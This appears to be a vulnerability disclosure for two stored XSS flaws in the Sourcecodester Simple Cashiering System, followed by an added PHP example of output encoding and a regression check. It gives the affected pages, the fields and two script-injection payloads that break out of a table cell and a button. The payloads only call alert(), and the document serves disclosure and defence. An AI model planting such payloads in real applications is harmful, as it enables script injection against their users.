I found two persistent XSS in the Sourcecodester Simple Cashiering System (POS) app.
- Vulnerable URL: http://localhost/cashiering/?page=products
- Affected field: all except price field
- Payload: 6231415</td><script>alert(1)</script>
- Vulnerable URL: http://localhost/cashiering/?page=manage_account
- Affected field: Full Name
- Payload: Administrator</button><script>alert("xss")</script>
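
Both findings come down to stored values being written into the page without output encoding. The following is an added example, not code from the application or from this post, and it assumes the pages are rendered server-side in PHP; the function names and product column names are hypothetical, and the sample records are constructed from the two payloads listed above.

```php
<?php
declare(strict_types=1);

// Encode a stored value for HTML element content or a quoted attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render one product row. Every column is encoded, so no field is left
// as an injection point. Column names are hypothetical.
function render_product_row(array $product): string
{
    $cells = '';
    foreach (['barcode', 'name', 'description', 'price'] as $column) {
        $cells .= '<td>' . e((string) ($product[$column] ?? '')) . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Render the account button that shows the user's Full Name.
function render_account_button(string $fullName): string
{
    return '<button type="button">' . e($fullName) . '</button>';
}

// Regression check: stored data must never yield a raw <script> tag.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed sample records holding the two payloads from the report.
$product = [
    'barcode'     => '6231415</td><script>alert(1)</script>',
    'name'        => 'Sample item',
    'description' => 'Sample description',
    'price'       => '10.00',
];
$fullName = 'Administrator</button><script>alert("xss")</script>';

foreach ([render_product_row($product), render_account_button($fullName)] as $html) {
    echo $html, PHP_EOL;
    echo contains_raw_script($html) ? 'FAIL: raw <script> present' : 'OK: payload rendered as text', PHP_EOL;
}
```

Encoding belongs at output time in each template, because values already stored in the database stay untouched and would otherwise keep firing after an input-side fix.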